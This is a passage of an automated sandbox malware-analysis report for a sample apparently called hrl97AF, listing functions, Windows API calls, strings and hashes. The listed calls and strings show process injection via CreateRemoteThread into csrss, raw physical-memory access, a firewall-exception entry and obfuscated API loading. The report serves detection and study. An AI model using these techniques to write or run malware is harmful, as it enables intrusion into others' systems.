NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,000065A4,00000000,?,00000002,00000000,00000040), ref: 7FE30774
NtOpenProcessToken.NTDLL(000000FF,00000020), ref: 7FE3078F
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,000065A4,00000000,?,00000002,00000000,00000040,00000000,000065A4), ref: 7FE307D2
Process32First.KERNEL32 ref: 7FE307E5
Process32Next.KERNEL32 ref: 7FE307F6
OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000065A4), ref: 7FE3080E
CreateRemoteThread.KERNEL32(?,00000000,00000000,-00002FC3,00000002,00000000), ref: 7FE3084B
CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000065A4), ref: 7FE30866
CloseHandle.KERNEL32 ref: 7FE30875

Strings

csrs, xrefs: 7FE30835
\BaseNamedObjects\rnxtVt, xrefs: 7FE30717
\BaseNamedObjects\rnxtVt, xrefs: 7FE30718, 7FE30735, 7FE30743

Memory Dump Source

Source File: 00000007.00000002.2043960210.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe30000_hrl97AF.jbxd

Similarity

API ID: Handle$Close$CreateOpenProcessProcess32lstrcpy$FirstModuleNextRemoteSectionSnapshotThreadTokenToolhelp32Viewlstrcat
String ID: \BaseNamedObjects\rnxtVt$\BaseNamedObjects\rnxtVt$csrs
API String ID: 1545766225-676502312
Opcode ID: dcfbda88c1452e16d26fd376d2d59b1fd8c40ae983f26fda525faf50f22b961d
Instruction ID: 4034ee1ac34cf344d60b1b743f91cb73119df433e2ee071f6ee9a8f8d678e866
Opcode Fuzzy Hash: dcfbda88c1452e16d26fd376d2d59b1fd8c40ae983f26fda525faf50f22b961d
Instruction Fuzzy Hash: 0961BD31A05209FFDB619F10C84DBEE3B6EEF45719F904068EA0A9E590C7B1AF05CB95

Function 7FE329CC Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 220filenativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FE32A36
NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FE32A55
MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FE32A7F
CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FE32A8C
UnmapViewOfFile.KERNEL32(?), ref: 7FE32AA4

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE32A00
\Device\PhysicalMemory, xrefs: 7FE329CC

Memory Dump Source

Source File: 00000007.00000002.2043960210.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe30000_hrl97AF.jbxd

Similarity

API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$\Device\PhysicalMemory
API String ID: 2985292042-3938670448
Opcode ID: f5b742b9587cdac67e2bb23952e5644605ce90bf8b7d29b5e49f46c6b19350d7
Instruction ID: f784499129cf61d4ff85df333bf3b76779e152c7d281c3d08bc0d42cf97a2f12
Opcode Fuzzy Hash: f5b742b9587cdac67e2bb23952e5644605ce90bf8b7d29b5e49f46c6b19350d7
Instruction Fuzzy Hash: 1C817A71A00219FFDB208F24CC89FAA77BDEF44705F614258ED499B295D3B0AF45CA91

Function 009B29CC Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 220filenativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 009B2A36
NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 009B2A55
MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 009B2A7F
CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 009B2A8C
UnmapViewOfFile.KERNEL32(?), ref: 009B2AA4

Strings

\Device\PhysicalMemory, xrefs: 009B29CC
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 009B2A00

Memory Dump Source

Source File: 00000007.00000002.2043369977.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9b0000_hrl97AF.jbxd

Similarity

API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$\Device\PhysicalMemory
API String ID: 2985292042-3938670448
Opcode ID: d4bbd99800a5ed16e67fd9b1e1255b72b407661223bcf3a707d0e03b541c6dfc
Instruction ID: 5d17eabab3570cef6317bbe20f380952279cf61ac3628bf94ffa36e688820904
Opcode Fuzzy Hash: d4bbd99800a5ed16e67fd9b1e1255b72b407661223bcf3a707d0e03b541c6dfc
Instruction Fuzzy Hash: 1E81AA71600219FFEB208F24CC89FAA7BADFF45711F244658ED099B291C7B0AF45CA90

Function 7FE329F1 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FE32A36
NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FE32A55
MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FE32A7F
CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FE32A8C
UnmapViewOfFile.KERNEL32(?), ref: 7FE32AA4

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE32A00
ysic, xrefs: 7FE32A3C, 7FE32A52

Memory Dump Source

Source File: 00000007.00000002.2043960210.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe30000_hrl97AF.jbxd

Similarity

API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$ysic
API String ID: 2985292042-2835701104
Opcode ID: e096a308c09e6b02b95fe1d014301fff9b14a95bfc109e57e88e1af0ff91d58a
Instruction ID: 318294e3e7f85719ab3bc7b1e15188bdad7b77c11d20dad426282bd8f2c8130f
Opcode Fuzzy Hash: e096a308c09e6b02b95fe1d014301fff9b14a95bfc109e57e88e1af0ff91d58a
Instruction Fuzzy Hash: 77116D70640705FBEB218F10CC49FAA3B7DEF88704F544218EE1A9A290D7B4AF14C655

Function 009B29F1 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 009B2A36
NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 009B2A55
MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 009B2A7F
CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 009B2A8C
UnmapViewOfFile.KERNEL32(?), ref: 009B2AA4

Strings

ysic, xrefs: 009B2A3C, 009B2A52
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 009B2A00

Memory Dump Source

Source File: 00000007.00000002.2043369977.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9b0000_hrl97AF.jbxd

Similarity

API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$ysic
API String ID: 2985292042-2835701104
Opcode ID: e096a308c09e6b02b95fe1d014301fff9b14a95bfc109e57e88e1af0ff91d58a
Instruction ID: 11370ddadd2c3fa92d20600b4c3851dbef3e2eff2192d446905542364170b9e9
Opcode Fuzzy Hash: e096a308c09e6b02b95fe1d014301fff9b14a95bfc109e57e88e1af0ff91d58a
Instruction Fuzzy Hash: A6115B70240609FBEB258F10CC49FAA3B6CEF88710F244628EE199B290D7B4AF148A55

Function 0047F6D4 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 220filenativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 0047F73E
NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 0047F75D
MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 0047F787
CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 0047F794
UnmapViewOfFile.KERNEL32(?), ref: 0047F7AC

Strings

\Device\PhysicalMemory, xrefs: 0047F6D4

Memory Dump Source

Source File: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
String ID: \Device\PhysicalMemory
API String ID: 2985292042-2007344781
Opcode ID: f5b742b9587cdac67e2bb23952e5644605ce90bf8b7d29b5e49f46c6b19350d7
Instruction ID: dbffc54f3f4b93b50b3eeccc6da7c51b8081ae6782131aca0f62d72c14de9156
Opcode Fuzzy Hash: f5b742b9587cdac67e2bb23952e5644605ce90bf8b7d29b5e49f46c6b19350d7
Instruction Fuzzy Hash: EC81AC71600114FFEB208F28CC89FAA77BDEF44710F258269ED099B291D3B4AF05CA95

Function 0047F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 0047F73E
NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 0047F75D
MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 0047F787
CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 0047F794
UnmapViewOfFile.KERNEL32(?), ref: 0047F7AC

Strings

ysic, xrefs: 0047F744, 0047F75A

Memory Dump Source

Source File: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
String ID: ysic
API String ID: 2985292042-20973071
Opcode ID: e096a308c09e6b02b95fe1d014301fff9b14a95bfc109e57e88e1af0ff91d58a
Instruction ID: 91616b339b69817b0c307470fa0380e6dce288ebc01f30f06508eb5204f8cd11
Opcode Fuzzy Hash: e096a308c09e6b02b95fe1d014301fff9b14a95bfc109e57e88e1af0ff91d58a
Instruction Fuzzy Hash: D1118270640605FBEB248F14CC49FEB377CEF84704F248229EE199B290D7B4AF158669

Function 7FE32425 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46stringnativeCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,\BaseNamedObjects\rnxtVt), ref: 7FE32431
lstrlenW.KERNEL32(?), ref: 7FE32438
NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,00000000), ref: 7FE3248D

Strings

\BaseNamedObjects\rnxtVt, xrefs: 7FE3242F

Memory Dump Source

Source File: 00000007.00000002.2043960210.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe30000_hrl97AF.jbxd

Similarity

API ID: CreateSectionlstrcpylstrlen
String ID: \BaseNamedObjects\rnxtVt
API String ID: 2597515329-2100028039
Opcode ID: 20bdb40ffb474c402f65f73e914af13d443f92d4dff509730c57e181749428e4
Instruction ID: 36e2f0a27fad33023740782982cd1b2969f7fc0a37d941ebf6b0748064d4bf92
Opcode Fuzzy Hash: 20bdb40ffb474c402f65f73e914af13d443f92d4dff509730c57e181749428e4
Instruction Fuzzy Hash: 9F0181B0790344BAF7305B29CC8BF5A3929DF81B51F948154F604AE1C4D5B99A0487AA

Function 009B2425 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46stringnativeCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,\BaseNamedObjects\rnxtVt), ref: 009B2431
lstrlenW.KERNEL32(?), ref: 009B2438
NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,00000000), ref: 009B248D

Strings

\BaseNamedObjects\rnxtVt, xrefs: 009B242F

Memory Dump Source

Source File: 00000007.00000002.2043369977.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9b0000_hrl97AF.jbxd

Similarity

API ID: CreateSectionlstrcpylstrlen
String ID: \BaseNamedObjects\rnxtVt
API String ID: 2597515329-2100028039
Opcode ID: 20bdb40ffb474c402f65f73e914af13d443f92d4dff509730c57e181749428e4
Instruction ID: 109d1591245053ee06c7fb24c14cb1ce65892ca2d81946e2c2894ae0968f9de7
Opcode Fuzzy Hash: 20bdb40ffb474c402f65f73e914af13d443f92d4dff509730c57e181749428e4
Instruction Fuzzy Hash: C20181B0790344BAF7305B2ACC8BF5A3928DF81B51F548154F604AE1C4D5B99A0487AA

Function 004019C0 Relevance: 152.7, APIs: 29, Strings: 58, Instructions: 421libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00401A1E
GetProcAddress.KERNEL32(00000000), ref: 00401A27
LoadLibraryA.KERNEL32(kernel32.dll,GetTempPathA), ref: 00401A37
GetProcAddress.KERNEL32(00000000), ref: 00401A3A

Part of subcall function 00401660: strstr.MSVCRT ref: 004016A7
Part of subcall function 00401660: strcspn.MSVCRT ref: 004016C4
Part of subcall function 00401660: strncpy.MSVCRT ref: 004016D3
Part of subcall function 00401660: strcspn.MSVCRT ref: 004016E3

Part of subcall function 00402F70: GetLocaleInfoW.KERNEL32(00000800,00000002,?,00000040,?,76F8F550,76F90BD0,00000072), ref: 00402F8B
Part of subcall function 00402F70: GetComputerNameA.KERNEL32 ref: 00402FA2
Part of subcall function 00402F70: lstrcpyA.KERNEL32(?,SOFTWARE\Microsoft\Windows NT\CurrentVersion), ref: 00402FBB
Part of subcall function 00402F70: strstr.MSVCRT ref: 00403024
Part of subcall function 00402F70: lstrcpyA.KERNEL32(?,Windows NT), ref: 00403114
Part of subcall function 00402F70: lstrcpyA.KERNEL32(?,HARDWARE\DESCRIPTION\System\CentralProcessor\0), ref: 0040313D

Part of subcall function 00401980: LoadLibraryA.KERNEL32 ref: 004019A0

CloseHandle.KERNEL32(?), ref: 00401C02
CloseHandle.KERNEL32(?), ref: 00401C3F
LoadLibraryA.KERNEL32(PlusCtrl.dll), ref: 00401C52

Strings

U, xrefs: 00401B1B
W, xrefs: 004019F2
d, xrefs: 00401B4C
T, xrefs: 00401B51
o, xrefs: 00401B56
w, xrefs: 00401AB5
e, xrefs: 00401FA9
e, xrefs: 00401FBD
A, xrefs: 00401FD6
i, xrefs: 00401FB3
e, xrefs: 00401FD1
., xrefs: 00401B02
d, xrefs: 00401B07
o, xrefs: 00401AF9
o, xrefs: 00401F95
L, xrefs: 00401B25
A, xrefs: 00401B6F
i, xrefs: 00401B60
ExitProcess, xrefs: 00401F14
e, xrefs: 00401F86
e, xrefs: 00401A19
F, xrefs: 00401B5B
G, xrefs: 00401F7B
F, xrefs: 00401A0A
o, xrefs: 00401B2F
l, xrefs: 00401B11
u, xrefs: 00401AE6
t, xrefs: 00401F8B
GetTempPathA, xrefs: 00401A29
F, xrefs: 00401FAE
t, xrefs: 00401A00
o, xrefs: 00401B42
a, xrefs: 00401B47
i, xrefs: 00401A0F
l, xrefs: 00401B3D
100200, xrefs: 00401F25, 00401F64
M, xrefs: 00401F90
l, xrefs: 00401FA4
m, xrefs: 00401AF4
R, xrefs: 00401B20
PlusCtrl.dll, xrefs: 00401C45
m, xrefs: 00401FCC
<6@, xrefs: 00402068
l, xrefs: 00401B65
SetFileAttributesA, xrefs: 00401EFF
a, xrefs: 00401FC7
e, xrefs: 00401B6A
u, xrefs: 00401F9F
l, xrefs: 00401FB8
N, xrefs: 00401FC2
kernel32.dll, xrefs: 004019E5, 00401A2E, 00401F04, 00401F19, 00401F81
l, xrefs: 00401B0C
i, xrefs: 004019FB
d, xrefs: 00401F9A
w, xrefs: 00401B34
l, xrefs: 00401AEF
D, xrefs: 00401B2A
l, xrefs: 00401A14

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: LibraryLoad$lstrcpy$AddressCloseHandleProcstrcspnstrstr$ComputerInfoLocaleNamestrncpy
String ID: .$100200$<6@$A$A$D$ExitProcess$F$F$F$G$GetTempPathA$L$M$N$PlusCtrl.dll$R$SetFileAttributesA$T$U$W$a$a$d$d$d$e$e$e$e$e$e$i$i$i$i$kernel32.dll$l$l$l$l$l$l$l$l$m$m$o$o$o$o$o$t$t$u$u$w$w
API String ID: 3552227398-19183163
Opcode ID: 379116b2d88aa8af1ebcdaaeb2c968e704b39e4d9bc54b5ade393c686307fa29
Instruction ID: 6d36ee71d4a81d0c90f4322b46838c243b43bcae610d34eb8121a6d16edaaa69
Opcode Fuzzy Hash: 379116b2d88aa8af1ebcdaaeb2c968e704b39e4d9bc54b5ade393c686307fa29
